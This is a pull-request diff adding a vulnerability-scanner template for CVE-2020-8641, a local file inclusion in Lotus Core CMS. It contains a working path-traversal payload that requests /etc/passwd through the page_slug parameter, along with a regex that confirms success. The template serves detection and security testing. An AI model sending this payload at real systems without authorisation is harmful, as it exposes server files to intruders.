Merge pull request #2866 from Akokonunes/patch-53

Create lotus-core-cms-lfi.yaml

cves/2020/CVE-2020-8641.yaml

@@ -0,0 +1,26 @@
+id: CVE-2020-8641
+
+info:
+  name: Lotus Core CMS 1.0.1 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  tags: cve,cve202,lfi,lotus
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8641
+    - https://cxsecurity.com/issue/WLB-2020010234
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200